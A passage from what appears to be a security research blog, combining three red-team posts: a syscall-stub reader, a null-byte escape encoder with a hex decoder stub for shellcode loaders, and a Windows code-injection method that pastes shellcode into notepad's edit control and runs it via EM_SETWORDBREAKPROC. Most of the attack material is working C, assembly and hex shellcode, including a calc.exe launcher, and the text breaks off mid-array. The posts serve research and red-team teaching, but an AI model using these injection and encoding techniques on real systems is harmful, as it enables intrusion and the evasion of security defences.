              // copy stub to memory
              CopyMemory(cs, (const void*)start, len);
            }
            break;
          }
        }
        // return pointer to code stub
        return cs;
    }
    

    Summary

    Invoking system calls via remapping of the NTDLL.dll is of course the simplest approach. A lightweight LDE and CFG with no dependencies on external libraries would be useful for other Red Teaming activities like hooking API or even detecting hooked functions. It could also be used for locating GetProcAddress without touching the Export Address Table (EAT) or Import Address Table (IAT). However, GetSyscallStub demonstrates that you don’t need a disassembler just to read the code stub.

    Shellcode: Encoding Null Bytes Faster With Escape Sequences

    By: odzhan
    26 June 2020 at 09:00

    Introduction

    Quick post about a common problem removing null bytes in the loader generated by Donut. Replacing opcodes that contain null bytes with equivalent snippets is enough to solve the problem for a shellcode of no more than a few hundred bytes. It’s also possible to automate using encoders found in msfvenom and pwntools. However, the problem most users experience is when the loader generated by Donut is a few hundred kilobytes or even a few megabytes! This post demonstrates how to use escape sequences to facilitate faster encoding of null bytes. Maybe “escape codes” is a better description? You can find a PoC encoder here, which can be used to add an x86/AMD64 decoder to a shellcode generated by Donut.

    XOR Cipher

    Readers will be aware of the eXclusive-OR (XOR) cipher and its extensive use as a component or building block in many cryptographic primitives. It’s also a popular choice for obfuscating shellcode and specifically removing null bytes. In the past, the following code in C is what I’d probably use to find a suitable key. It will work with keys of any length, but is slow as hell for anything more than 24-Bits.

    int find_xor_key(
      const void *inbuf, u32 inlen, 
      void *outbuf, int outlen) 
    {
        int i, j, keylen=1;
        u8  *in = (u8*)inbuf, *key=(u8*)outbuf;
        
        // initialize key
        for(i=0; i<outlen; i++) {
          key[i] = (i < keylen) ? 0 : -1;
        }
        
        // while keylen is less than max key requested
        while(keylen < outlen) {
          // xor data with current key
          for(i=0; i<inlen; i++) {
            // if the result of xor is zero. end loop
            if((in[i] ^ key[i % keylen]) == 0) break;
          }
          // if we processed all data successfully
          if(i == inlen) {
            // return current key and its length
            return keylen;
          }
          // otherwise, update the key
          for(i=0; ; i++) {
            if(++key[i]) break;
          }
          // update the key length
          if(i == keylen) keylen++;
        }
        // return nothing found
        return 0;
    }
    

    The following function can be used to test it and works relatively fast for something that’s compact, like 1KB, but sucks for anything > 3072 bytes, which I admit is unusual for shellcode.

    void test_key(void) {
        int i, keylen;
        u8  key[8], data[1024];
        
        srand(time(0));
        
        // fill buffer with pseudo-random bytes
        for(i=0; i<sizeof(data); i++) {
          data[i] = rand();
        }
        // try find a suitable XOR key for the data
        keylen = find_xor_key(data, sizeof(data), key, sizeof(key));
        
        printf("Suitable key %sfound.\n\n", 
          keylen ? "" : "could not be ");
        
        if(keylen) {
          printf("Key length : %i\nKey        : ", keylen);
          while(keylen--) {
            printf("%02x ", key[keylen]);
          }
          putchar('\n');
        }
    }
    

    find_xor_key() could be re-written to use multiple threads and this would speed up the search. You might even be able to use a GPU or cluster of computers, but the overall problem isn’t finding a key. We’re not trying to crack ciphertext. All we want to do is encode and later decode null bytes, and for the Donut loader, this approach is very inefficient.

    Encoding Algorithm

    Escape sequences have been used in computing since the 1970s and most of you will already be familiar with them. I’m not sure if I’m using the correct terminology for what I describe next, but hopefully you’ll understand why I did. Textual encoding algorithms like Base64, Ascii85 and BasE91 were considered first of course. And Qkumba wrote a very cool base64 decoder that uses just ASCII characters that I was very tempted to use. In the end, using an escape code to indicate a null byte is simpler to implement.

    1. Read a byte from the input file or stream and assign to X.
    2. Assign X plus 1 to Y.
    3. If Y is not 0 or 1, goto step 6.
    4. Save the escape sequence 0x01 to the output file or stream.
    5. XOR X with predefined 8-Bit key K, goto step 7.
    6. Add 1 to X.
    7. Save X to the output file or stream.
    8. Repeat step 1-7 until EOF.

    Although I use an XOR cipher in step 5, it could be replaced with something else.

    static
    void nullz_encode(FILE *in, FILE *out) {
        char c, t;
        
        for(;;) {
          // read byte
          c = getc(in);
          // end of file? exit
          if(feof(in)) break;
          // adding one is just an example
          t = c + 1;
          // is the result 0(avoid) or 1(escape)?
          if(t == 0 || t == 1) {
            // write escape sequence
            putc(0x01, out);
            // The XOR is an optional step.
            // Avoid using 0x00 or 0xFF with XOR!
            putc(c ^ NULLZ_KEY, out);
          } else {
            // save byte plus 1
            putc(c + 1, out);
          }
        }
    }
    

    Decoding Algorithm

    1. Read a byte from the input file or stream and assign to X.
    2. If X is not an escape sequence 0x01, goto step 5.
    3. Read a byte from the input file or stream and assign to X.
    4. XOR X with predefined 8-Bit key K used for encoding, goto step 6.
    5. Subtract 1 from X.
    6. Save X to the output file or stream.
    7. Repeat steps 1-6 until EOF.
    static
    void nullz_decode(FILE *in, FILE *out) {
        char c, t;
        
        for(;;) {
          // read byte
          c = getc(in);
          // end of file? exit
          if(feof(in)) break;
          // if this is an escape sequence
          if(c == 0x01) {
            // read next byte and XOR it
            c = getc(in);
            // The XOR is an optional step.
            putc(c ^ NULLZ_KEY, out);
          } else {
            // else subtract byte
            putc(c - 1, out);
          }
        }
    }
    

    x86/AMD64 assembly

    This assembly is compatible with both 32-Bit and 64-bit modes. It expects to run from RWX memory, so YMMV with this. If you want to execute from RX memory only, then this will require allocation of memory on the stack.

        bits   32
        
        %define NULLZ_KEY 0x4D
        
    nullz_decode:
    _nullz_decode:
        jmp    init_code
    load_code:
        pop    esi
        lodsd                    ; load original length of data
        xor    eax, 0x12345678   ; change to 32-bit key    
        xchg   eax, ecx
        push   esi               ; save pointer to code on stack
        pop    edi               ; 
        push   esi
    decode_main:
        lodsb                    ; read a byte
        dec    al                ; c - 1
        jnz    save_byte
        lodsb                    ; read next byte
        xor    al, NULLZ_KEY     ; c ^= NULLZ_KEY
    save_byte:
        stosb                    ; save in buffer
        loop   decode_main
        ret                      ; execute shellcode
    init_code:
        call   load_code
        ; XOR encoded shellcode goes here..
    

    Building the Loader

    1. Allocate memory to hold the decoder, 32-bits for the original length of input file and file data itself.
    2. Copy the decoder to memory.
    3. Set the key in decoder that will decrypt the original length. The offset of this value is defined by NULLZ_LEN.
    4. Set the original length, encrypted with XOR, right after the decoder.
    5. Set input file data right after the original length.
    6. Save memory to file.

    An option to update the XOR key is left up to you.

    // compatible with x86 and x86-64
    char NULLZ_DECODER[] = {
      /* 0000 */ "\xeb\x17"             /* jmp   0x19            */
      /* 0002 */ "\x5e"                 /* pop   esi             */
      /* 0003 */ "\xad"                 /* lodsd                 */
    #define NULLZ_LEN 5
      /* 0004 */ "\x35\x78\x56\x34\x12" /* xor   eax, 0x12345678 */
      /* 0009 */ "\x91"                 /* xchg  eax, ecx        */
      /* 000A */ "\x56"                 /* push  esi             */
      /* 000B */ "\x5f"                 /* pop   edi             */
      /* 000C */ "\x56"                 /* push  esi             */
      /* 000D */ "\xac"                 /* lodsb                 */
      /* 000E */ "\xfe\xc8"             /* dec   al              */
      /* 0010 */ "\x75\x03"             /* jne   0x15            */
      /* 0012 */ "\xac"                 /* lodsb                 */
      /* 0013 */ "\x34\x4d"             /* xor   al, 0x4d        */
      /* 0015 */ "\xaa"                 /* stosb                 */
      /* 0016 */ "\xe2\xf5"             /* loop  0xd             */
      /* 0018 */ "\xc3"                 /* ret                   */
      /* 0019 */ "\xe8\xe4\xff\xff\xff" /* call  2               */
    };
    

    Summary

    Before settling with escape sequences, I examined a number of other ways that null bytes might be encoded and decoded at runtime by a shellcode.

    Initially, I thought of byte substitution, which is a non-linear operation used by legacy block ciphers. Scrapped that idea.

    Experimented with match referencing, which is very common for lossless compression algorithms. Wrote a few bits of code to process files and then calculate the change in size. For every null byte found in a file, save the position and length before passing the null bytes to a function F for modification. An involution, like an XOR is fine to use as F. Then encode the offset and length using elias gamma2 codes. The change in file size was approx. 4% and I thought this might be the best way. It requires more code and is more complicated, but certainly an option.

    Thought about bit tags. Essentially using 1-Bit to indicate whether a byte is encoded or not. Change in file size would be ~12% since every byte would require 1-Bit. This eventually led to escape sequences, which I think is the best approach.

    Windows Process Injection: EM_GETHANDLE, WM_PASTE and EM_SETWORDBREAKPROC

    By: odzhan
    7 July 2020 at 00:30
    1. Introduction
    2. Edit Controls
    3. Writing CP-1252 Compatible Code
      1. Initialization
      2. Set RAX to 0
      3. Set RAX to 1
      4. Set RAX to -1
      5. Load and Store Data
      6. Two Byte Instructions
      7. Prefix Codes
    4. Generating Shellcode
    5. Injecting and Executing
    6. Demonstration
    7. Encoding Arbitrary Data
      1. Encoding
      2. Decoding
    8. Acknowledgements
    9. Further Research
    10. Scrapheap

    1. Introduction

    ‘Shatter attacks’ use Window messages for privilege escalation and were first described in August 2002 by Kristin Paget. Early examples demonstrated using WM_SETTEXT for injection of code and WM_TIMER to execute it. While Microsoft attempted to address the problem with a patch in December 2002, Oliver Lavery later demonstrated how EM_SETWORDBREAKPROC can also execute code. Kristin Paget delivered a followup paper and presentation in August 2003 describing other messages for code redirection. Brett Moore also published a paper in October 2003 that includes a comprehensive list of all messages that could be used for both injection and redirection.

    Without focusing on the design of Windows itself, Shatter attacks were possible for two reasons: No isolation between processes sharing the same interactive desktop, and for allowing code to run from the stack and heap. Starting with Windows Vista and Server 2008, User Interface Privilege Isolation (UIPI) solves the first problem by defining a set of UI privilege levels to prevent a low-privileged process sending messages to a high-privileged process. Data Execution Prevention (DEP) , which was introduced earlier in Windows XP Service Pack 2, solves the second problem. With both features enabled, Shatter attacks are no longer effective. Although DEP and UIPI block Shatter attacks, they do not prevent using window messages for code injection.

    ESET recently published a paper on the Invisimole malware, drawing attention to its use of LVM_SETITEMPOSITION and LVM_GETITEMPOSITION for injection and LVM_SORTITEMS for execution. Using LVM_SORTITEMS to execute code was first suggested by Kristin Paget at Blackhat 2003 and later rediscovered by Adam. PoC codes were published in a previous blog entry here, and by Csaba Fitzl here.

    For this post, I’ve written a PoC that does the following:

    • Use the clipboard and WM_PASTE message to inject code into the notepad process.
    • Use the EM_GETHANDLE message and ReadProcessMemory to obtain the buffer address of our code.
    • Use VirtualProtectEx to change memory permissions from Read-Write to Read-Write-Execute.
    • Use the EM_SETWORDBREAKPROC and WM_LBUTTONDBLCLK to execute shellcode.

    Although VirtualProtectEx is used, it may be possible to run notepad with DEP disabled. It’s also worth pointing out the shellcode is designed for CP-1252 encoding rather than UTF-8 encoding, so the PoC may not work on every system. The injection method will succeed, but notepad is likely to crash after the conversion to unicode.

    2. Edit Controls

    Adam writes in Talking to, and handling (edit) boxes about code injection via edit controls and using EM_GETHANDLE to obtain the address of where the code is stored. Using notepad as an example, one can open a file containing executable code or use the clipboard and the WM_PASTE message to inject into notepad.

    To show where the edit control input is stored in memory, run notepad and type in “modexp”. Attach WinDbg and type in the following command: !address /f:Heap /c:”s -u %1 %2 \”modexp\””. This will search heap memory for the Unicode string “modexp”. Why Unicode? Since Comctl32.dll version 6, controls only use Unicode. Figure 1 shows the output of this command.

    Figure 1. Searching memory for the string in Notepad.

    To read the edit control handle, we send EM_GETHANDLE to the window handle. Alternatively, you can use GetWindowLongPtr(0) and ReadProcessMemory(ULONG_PTR), but EM_GETHANDLE will do it in one call. Figure 2 shows the result of executing the following code.

        hw = FindWindow("Notepad", NULL);
        hw = FindWindowEx(hw, NULL, "Edit", NULL);
        emh = (PVOID)SendMessage(hw, EM_GETHANDLE, 0, 0); 
        printf("EM Handle : %p\n", emh);
    

    Figure 2. The memory pointer returned by EM_GETHANDLE

    The handle points to the buffer allocated for input as you can see in Figure 3.

    Figure 3. Buffer allocated for input.

    Since the input is stored in Unicode format, it’s not possible to just copy any shellcode to the clipboard and paste into the edit control. On my system, notepad converts the clipboard data to Unicode using the CP_ACP codepage, which is using Windows-1252 (CP-1252) encoding. CP-1252 is a single byte character set used by default in legacy components of Microsoft Windows for languages derived from the Latin alphabet. When notepad receives the WM_PASTE message, it invokes GetClipboardData() with CF_UNICODETEXT as the format. Internally, this invokes GetClipboardCodePage(), which on my system returns CP_ACP, before invoking MultiByteToWideChar() converting the text into Unicode format. For CF_TEXT format, ensure the code you copy to the clipboard doesn’t contain characters in the ranges [0x80, 0x8C], [0x91, 0x9C] or 0x8E, 0x9E and 0x9F. These “bad characters” will be converted to double byte character encodings. For UTF-8, only bytes in range [0x00, 0x7F] can be used.

    NOTE: You can paste shellcode as CF_UNICODETEXT and avoid writing complex Ansi shellcode as I have in this post. Just ensure to avoid two consecutive null bytes that indicate string termination. e.g “\x00\x00”

    3. Writing CP-1252 Compatible Code

    If writing Ansi shellcode that will be converted to Unicode before execution, let’s start by looking at x86/x64 instructions that can be used safely after conversion by MultiByteToWideChar() using CP_ACP as the code page.

    3.1 Initialization

    Throughout the code, you’ll see the following.

    "\x00\x4d\x00"         /* add   byte [rbp], cl */
    

    Consider it a NOP instruction because it’s only intended to insert null bytes between other instructions so that the final assembly code in Ansi is compatible with CP-1252 encoding. Using BP requires three bytes and can be used almost right away.

    Well, that last statement is not entirely true. For 32-Bit mode, creating a stack frame is a normal part of any procedure and authors of older articles on Unicode shellcode rightly presume BP contains the value of the Stack Pointer (SP). Unless BP was unexpectedly overwritten, any write operations with this instruction on 32-Bit systems won’t cause an exception. However, the same cannot be said for 64-Bit, which depending on the compiler normally avoids using BP to address local variables. For that reason, we must copy SP to BP ourselves before doing anything else. The only instruction between 1-5 bytes I could identify as a solution to this was ENTER. Another thing we do is set AL to 0, so that we’re not overwriting anything on the stack address RBP contains. The following allocates 256 bytes of memory and copies SP to BP.

        ; ************************* prolog
        mov    al, 0
        enter  256, 0
        
        ; save rbp
        push   rbp
        add    [rbp], al
        
        ; create local variable for rbp
        push   0
        push   rsp
        add    [rbp], al
        
        pop    rbp
        add    [rbp], cl
    

    If we examine the EDITWORDBREAKPROCA callback function, we can see lpch is a pointer to the text of the edit control.

    EDITWORDBREAKPROCA EDITWORDBREAKPROCA;
    
    int EDITWORDBREAKPROCA(
      LPSTR lpch,
      int ichCurrent,
      int cch,
      int code
    )
    {...}
    

    If you’re familiar with the Microsoft fastcall convention for x64 mode, you’ll already know the first four arguments are placed in RCX, RDX, R8 and R9. This callback will load lpch into RCX. This will be useful later.

    3.2 Set RAX to 0

    PUSH 0 creates a local variable on the stack and assigns zero to it. The variable is then loaded with POP RAX.

    "\x6a\x00"             /* push  0                   */
    "\x58"                 /* pop   rax                 */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    

    Copy 0xFF00FF00 to EAX. Subtract 0xFF00FF00. It should be noted that these operations will zero out the upper 32-bits of RAX and are insufficient for adding and subtracting with memory addresses.

    "\xb8\x00\xff\x00\xff" /* mov   eax, 0xff00ff00     */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    "\x2d\x00\xff\x00\xff" /* sub   eax, 0xff00ff00     */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    

    Copy 0xFF00FF00 to EAX. Bitwise XOR with 0xFF00FF00.

    "\xb8\x00\xff\x00\xff" /* mov   eax, 0xff00ff00     */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    "\x35\x00\xff\x00\xff" /* xor   eax, 0xff00ff00     */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    

    Copy 0xFE00FE00 to EAX. Bitwise AND with 0x01000100.

    "\xb8\x00\xfe\x00\xfe" /* mov   eax, 0xfe00fe00     */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    "\x25\x00\x01\x00\x01" /* and   eax, 0x01000100      */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    

    3.3 Set RAX to 1

    PUSH 0 creates a local variable we’ll call X and assigns a value of 0. PUSH RSP creates a local variable we’ll call A and assigns the address of X. POP RAX loads A into the RAX register. INC DWORD[RAX] assigns 1 to X. POP RAX loads X into the RAX register.

    "\x6a\x00"     /* push 0              */
    "\x54"         /* push rsp            */
    "\x00\x4d\x00" /* add  byte [rbp], cl */
    "\x58"         /* pop  rax            */
    "\x00\x4d\x00" /* add  byte [rbp], cl */
    "\xff\x00"     /* inc  dword [rax]    */
    "\x58"         /* pop  rax            */
    "\x00\x4d\x00" /* add  byte [rbp], cl */
    

    PUSH 0 creates a local variable we’ll call X and assigns a value of 0. PUSH RSP creates a local variable we’ll call A and assigns the address of X. POP RAX loads A into the RAX register. MOV BYTE[RAX], 1 assigns 1 to X. POP RAX loads X into the RAX register.

    "\x6a\x00"         /* push  0              */
    "\x54"             /* push  rsp            */
    "\x00\x4d\x00"     /* add   byte [rbp], cl */
    "\x58"             /* pop   rax            */
    "\x00\x4d\x00"     /* add   byte [rbp], cl */
    "\xc6\x00\x01"     /* mov   byte [eax], 1  */
    "\x00\x4d\x00"     /* add   byte [rbp], cl */
    "\x58"             /* pop   rax            */
    "\x00\x4d\x00"     /* add   byte [rbp], cl */
    

    3.4 Set RAX to -1

    PUSH 0 creates a local variable we’ll call X and assigns a value of 0. POP RCX loads X into the RCX register. LOOP $+2 decreases RCX by 1 leaving -1. PUSH RCX stores -1 on the stack and POP RAX sets RAX to -1.

    "\x6a\x00"         /* push  0              */
    "\x59"             /* pop   rcx            */
    "\x00\x4d\x00"     /* add   byte [rbp], cl */
    "\xe2\x00"         /* loop  $+2            */
    "\x34\x00"         /* xor   al, 0          */
    "\x51"             /* push  rcx            */
    "\x00\x4d\x00"     /* add   byte [rbp], cl */
    "\x58"             /* pop   rax            */
    

    PUSH 0 creates a local variable we’ll call X and assigns a value of 0. PUSH RSP creates a local variable we’ll call A and assigns the address of X. POP RAX loads A into the RAX register. INC DWORD[RAX] assigns 1 to X. IMUL EAX, DWORD[RAX], -1 multiplies X by -1 and stores the result in EAX.

    "\x6a\x00"     /* push 0                    */
    "\x54"         /* push rsp                  */
    "\x00\x4d\x00" /* add  byte [rbp], cl       */
    "\x58"         /* pop  rax                  */
    "\x00\x4d\x00" /* add  byte [rbp], cl       */
    "\xff\x00"     /* inc  dword [rax]          */
    "\x6b\x00\xff" /* imul eax, dword [rax], -1 */
    "\x00\x4d\x00" /* add  byte [rbp], cl       */
    "\x59"         /* pop  rcx                  */
    

    3.5 Load and Store Data

    Initializing registers to 0, 1 or -1 is not a problem, as you can see from the above examples. Loading arbitrary data is a bit trickier, but you can get creative with some aproaches.

    Let’s take for example setting EAX to 0x12345678.

    "\xb8\x78\x56\x34\x12" /* mov   eax, 0x12345678  */
    

    This uses IMUL to set EAX to 0x00340078 and an XOR with 0x12005600 to finish it off.

    "\x6a\x00"                 /* push 0                          */
    "\x54"                     /* push rsp                        */
    "\x00\x4d\x00"             /* add  byte [rbp], cl             */
    "\x58"                     /* pop  rax                        */
    "\x00\x4d\x00"             /* add  byte [rbp], cl             */
    "\xff\x00"                 /* inc  dword [rax]                */
    "\x69\x00\x78\x00\x34\x00" /* imul eax, dword [rax], 0x340078 */
    "\x58"                     /* pop  rax                        */
    "\x00\x4d\x00"             /* add  byte [rbp], cl             */
    "\x35\x00\x56\x00\x12"     /* xor  eax, 0x12005600            */
    

    Create a local variable we’ll call X, by storing 0 on the stack. Create a local variable we’ll call A, which contains the address of X . Load A into RAX. Store 0x00340078 in X using MOV DWORD[RAX], 0x00340078. Load X into RAX. XOR EAX with 0x12005600. EAX now contains 0x12345678.

    "\x6a\x00"                 /* push   0                      */
    "\x54"                     /* push   rsp                    */
    "\x00\x4d\x00"             /* add    byte [rbp], cl         */
    "\x58"                     /* pop    rax                    */
    "\x00\x4d\x00"             /* add    byte [rbp], cl         */
    "\xc7\x00\x78\x00\x34\x00" /* mov    dword [rax], 0x340078  */
    "\x58"                     /* pop    rax                    */
    "\x00\x4d\x00"             /* add    byte [rbp], cl         */
    "\x35\x00\x56\x00\x12"     /* xor    eax, 0x12005600        */
    "\x00\x4d\x00"             /* add    byte [rbp], cl         */
    

    Another way using Rotate Left (ROL).

    "\x68\x00\x78\x00\x34" /* push  0x34007800        */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\x54"                 /* push  rsp               */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\x58"                 /* pop   rax               */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\xc1\x00\x18"         /* rol   dword [rax], 0x18 */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\x58"                 /* pop   rax               */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\x35\x00\x56\x00\x12" /* xor   eax, 0x12005600   */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    

    Another example using MOV and ROL.

    "\x68\x00\x56\x00\x12" /* push  0x12005600        */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\x54"                 /* push  rsp               */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\x58"                 /* pop   rax               */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\xc6\x00\x78"         /* mov   byte [rax], 0x78  */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\xc1\x00\x10"         /* rol   dword [rax], 0x10 */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\xc6\x00\x34"         /* mov   byte [rax], 0x34  */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\xc1\x00\x10"         /* rol   dword [rax], 0x10 */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\x58"                 /* pop   rax               */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    

    Final example uses MOV, ADD, SCASB with the address of buffer stored in RDI.

    "\x6a\x00"             /* push  0                 */
    "\x54"                 /* push  rsp               */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\x5f"                 /* pop   rdi               */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\xb8\x00\x12\x00\xff" /* mov   eax, 0xff001200   */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\xbb\x00\x34\x00\xff" /* mov   ebx, 0xff003400   */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\xb9\x00\x56\x00\xff" /* mov   ecx, 0xff005600   */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\xba\x00\x78\x00\xff" /* mov   edx, 0xff007800   */
    "\x00\x27"             /* add   byte [rdi], ah    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\xae"                 /* scasb                   */
    "\x00\x3f"             /* add   byte [rdi], bh    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\xae"                 /* scasb                   */
    "\x00\x2f"             /* add   byte [rdi], ch    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\xae"                 /* scasb                   */
    "\x00\x37"             /* add   byte [rdi], dh    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\x58"                 /* pop   rax               */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    

    3.6 Two Byte Instructions

    If all you need are two byte instructions that contain one null byte, the following may be considered. For the branch instructions, regardless of whether a condition is true or false, the instruction is always branching to the next address. The loop instructions might be useful if you want to subtract 1 from an address. To add 1 or 4 to an address, copy it to RDI and use SCASB or SCASD. LODSB or LODSD can be used too if the address is in RSI, but just remember they overwrite AL and EAX respectively.

        ; logic
        or al, 0
        
        xor al, 0
        
        and al, 0
        
        ; arithmetic
        add al, 0
        
        adc al, 0
        
        sbb al, 0
        
        sub al, 0
        
        ; comparison predicates
        cmp al, 0
        
        test al, 0
        
        ; data transfer
        mov al, 0
        mov ah, 0
        
        mov bl, 0
        mov bh, 0
        
        mov cl, 0
        mov ch, 0
        
        mov dl, 0
        mov dh, 0
        
        ; branches
        jmp $+2
        
        jo $+2
        jno $+2
      
        jb $+2
        jae $+2
        
        je $+2
        jne $+2
        
        jbe $+2
        ja $+2
        
        js $+2
        jns $+2
        
        jp $+2
        jnp $+2
        
        jl $+2
        jge $+2
        
        jle $+2
        jg $+2
    
        jrcxz $+2
        
        loop $+2
        
        loope $+2
        
        loopne $+2
    

    3.7 Prefix Codes

    Some of these prefixes can be used to pad an instruction. The only instructions I tested were 8-Bit operations.

    Prefix Description
    0x2E, 0x3E Branch hints have no effect on anything newer than a Pentium 4. Harmless to use up a byte of space between instructions.
    0xF0 The LOCK prefix guarantees the instruction has exclusive use of all shared memory, until the instruction completes execution.
    0xF2, 0xF3 REP(0xF2) tells the CPU to repeat execution of a string manipulation instruction like MOVS, STOS, CMPS or SCAS until RCX is zero. REPNE (0xF3) repeats execution until RCX is zero or the Zero Flag (ZF) is cleared.
    0x26, 0x2E, 0x36, 0x3E, 0x64, 0x65 The Extra Segment (ES) (0x26) prefix is used for the destination of string operations. The Code Segment (CS) (0x2E) for all instructions is the same as a branch hint and has no effect. The Stack Segment (0x36) is used for storing and loading local variables with instructions like PUSH/POP. The Data Segment (DS) (0x3E) for all data references, except stack and is also the same as a branch hint, which has no effect. FS(0x64) and GS(0x65) are not designated, but you’ll see them used to access the Thread Environment Block (TEB) on Windows or the Thread Local Storage (TLS) on Linux.
    0x66, 0x67 Used to override the default size of a data type in 32-bit mode for a PUSH/POP or MOV. NASM/YASM support operand-size (0x66) and operand-address (0x67) prefixes using a16, a32, o16 and o32.
    0x40 – 0x4F REX prefixes for 64-Bit mode.

    4. Generating Shellcode

    Some things to consider when writing your own.

    • Preserve all non-volatile registers used. RSI, RDI, RBP, RBX
    • Allocate 32 bytes for homespace. This will be used by any API you invoke.
    • Before invoking API, ensure the value of SP is aligned by 16 bytes minus 8.

    Some API will use SIMD instructions, usually for memcpy() or memset() of small blocks of data. To achieve optimal performance, the data accessed must be aligned by 16 bytes. If the stack pointer is misaligned and SIMD instructions are used to read or write to SP, this will result in an unhandled exception. Since we can’t use a CALL instruction, RET is used instead and once executed removes an API address from the stack. If it’s not aligned by 16 bytes at that point, expect trouble! 🙂

    Using previous examples, the following code will construct a CP-1252 compatible shellcode to execute calc.exe using kernel32!WinExec(). This is simply to demonstrate the injection via notepads edit control works.

    // the max address for virtual memory on 
    // windows is (2 ^ 47) - 1 or 0x7FFFFFFFFFFF
    #define MAX_ADDR 6
    
    // only useful for CP_ACP codepage
    static
    int is_cp1252_allowed(int ch) {
      
        // zero is allowed, but we can't use it for the clipboard
        if(ch == 0) return 0;
        
        // bytes converted to double byte characters
        if(ch >= 0x80 && ch <= 0x8C) return 0;
        if(ch >= 0x91 && ch <= 0x9C) return 0;
        
        return (ch != 0x8E && ch != 0x9E && ch != 0x9F);
    }
    
    // Allocate 64-bit buffer on the stack.
    // Then place the address in RDI for writing.
    #define STORE_ADDR_SIZE 10
    
    char STORE_ADDR[] = {
      /* 0000 */ "\x6a\x00"             /* push 0                */
      /* 0002 */ "\x54"                 /* push rsp              */
      /* 0003 */ "\x00\x5d\x00"         /* add  byte [rbp], cl   */
      /* 0006 */ "\x5f"                 /* pop  rdi              */
      /* 0007 */ "\x00\x5d\x00"         /* add  byte [rbp], cl   */
    };
    
    // Load an 8-Bit immediate value into AH
    #define LOAD_BYTE_SIZE 5
    
    char LOAD_BYTE[] = {
      /* 0000 */ "\xb8\x00\xff\x00\x4d" /* mov   eax, 0x4d00ff00 */
    };
    
    // Subtract 32 from AH
    #define SUB_BYTE_SIZE 8
    
    char SUB_BYTE[] = {
      /* 0000 */ "\x00\x5d\x00"         /* add   byte [rbp], cl  */
      /* 0003 */ "\x2d\x00\x20\x00\x5d" /* sub   eax, 0x4d002000 */
    };
    
    // Store AH in buffer and advance RDI by 1
    #define STORE_BYTE_SIZE 9
    
    char STORE_BYTE[] = {
      /* 0000 */ "\x00\x27"             /* add   byte [rdi], ah  */
      /* 0002 */ "\x00\x5d\x00"         /* add   byte [rbp], cl  */
      /* 0005 */ "\xae"                 /* scasb                 */
      /* 0006 */ "\x00\x5d\x00"         /* add   byte [rbp], cl  */
    };
    
    // Transfers control of execution to kernel32!WinExec
    #define RET_SIZE 2
    
    char RET[] = {
      /* 0000 */ "\xc3" /* ret  */
      /* 0002 */ "\x00"
    };
    
    #define CALC3_SIZE 164
    #define RET_OFS 0x20 + 2
    
    char CALC3[] = {
      /* 0000 */ "\xb0\x00"                 /* mov   al, 0                 */
      /* 0002 */ "\xc8\x00\x01\x00"         /* enter 0x100, 0              */
      /* 0006 */ "\x55"                     /* push  rbp                   */
      /* 0007 */ "\x00\x45\x00"             /* add   byte [rbp], al        */
      /* 000A */ "\x6a\x00"                 /* push  0                     */
      /* 000C */ "\x54"                     /* push  rsp                   */
      /* 000D */ "\x00\x45\x00"             /* add   byte [rbp], al        */
      /* 0010 */ "\x5d"                     /* pop   rbp                   */
      /* 0011 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 0014 */ "\x57"                     /* push  rdi                   */
      /* 0015 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 0018 */ "\x56"                     /* push  rsi                   */
      /* 0019 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 001C */ "\x53"                     /* push  rbx                   */
      /* 001D */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 0020 */ "\xb8\x00\x4d\x00\xff"     /* mov   eax, 0xff004d00       */
      /* 0025 */ "\x00\xe1"                 /* add   cl, ah                */
      /* 0027 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 002A */ "\xb8\x00\x01\x00\xff"     /* mov   eax, 0xff000100       */
      /* 002F */ "\x00\xe5"                 /* add   ch, ah                */
      /* 0031 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 0034 */ "\x51"                     /* push  rcx                   */
      /* 0035 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 0038 */ "\x5b"                     /* pop   rbx                   */
      /* 0039 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 003C */ "\x6a\x00"                 /* push  0                     */
      /* 003E */ "\x54"                     /* push  rsp                   */
      /* 003F */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 0042 */ "\x5f"                     /* pop   rdi                   */
      /* 0043 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 0046 */ "\x57"                     /* push  rdi                   */
